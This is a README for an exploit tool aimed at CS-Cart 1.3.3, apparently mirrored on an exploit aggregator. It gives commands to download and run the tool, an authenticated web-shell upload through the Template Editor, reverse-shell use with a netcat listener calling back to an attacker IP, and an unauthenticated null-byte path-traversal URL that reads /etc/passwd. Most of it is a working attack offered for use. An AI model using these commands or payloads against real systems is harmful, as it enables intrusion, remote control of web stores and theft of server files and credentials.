Share
## https://sploitus.com/exploit?id=18A22E1F-48FA-5AAE-88B7-92C3FF4DB833
# CS-Cart RCE & LFI Exploit
**Developed by:** Strikoder
**Tested on:** CS-Cart 1.3.3
Multi-purpose exploitation tool for CS-Cart vulnerabilities including authenticated RCE via Template Editor upload and LFI via PHPMailer.
## Screenshots
## Features
- **Authenticated RCE** - Upload malicious .phtml files through Template Editor
- **Reverse Shell** - Multiple methods including base64 encoded bash, Python, and netcat variants
- **Command Execution** - Execute single commands or interactive shell mode
- **LFI Exploitation** - Read arbitrary files via PHPMailer class vulnerability
## Installation
**Option 1: Git Clone**
```bash
git clone https://github.com/strikoder/cscart-rce-lfi-exploit
cd cscart-rce-lfi-exploit
pip3 install requests
```
**Option 2: Direct Download**
```bash
wget https://raw.githubusercontent.com/strikoder/cscart-rce-lfi-exploit/main/cscart_exploit.py
pip3 install requests
```
## Usage
### Command Execution
```bash
python3 cscart_exploit.py -t http://target.com -u admin -p admin -c "id"
```
### LFI (No Authentication Required)
```bash
python3 cscart_exploit.py -t http://target.com --lfi /etc/passwd
```
### Reverse Shell
```bash
# Start listener first
nc -lvnp 443
# Trigger reverse shell
python3 cscart_exploit.py -t http://target.com -u admin -p admin -i YOUR_IP 443
```
## Options
```
-t, --target Target URL (required)
-u, --username Admin username (default: admin)
-p, --password Admin password (default: admin)
-s, --shell-name Shell filename without extension (default: shell)
-c, --command Execute single command
-i, --interactive Reverse shell mode (IP PORT)
--lfi LFI mode - read file path
```
## Technical Details
### RCE Upload Process
1. Authenticate to `/admin.php` with provided credentials
2. Upload .phtml file to Template Editor endpoint
3. File is stored in `/skins/` directory
4. Access shell at `http://target/skins/shellname.phtml?cmd=command`
### LFI Exploitation
The PHPMailer class includes files based on the `classes_dir` parameter without proper validation:
```
http://target/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../etc/passwd%00
```
Null byte (`%00`) truncates the path and bypasses extension checks.
## Author
**Strikoder**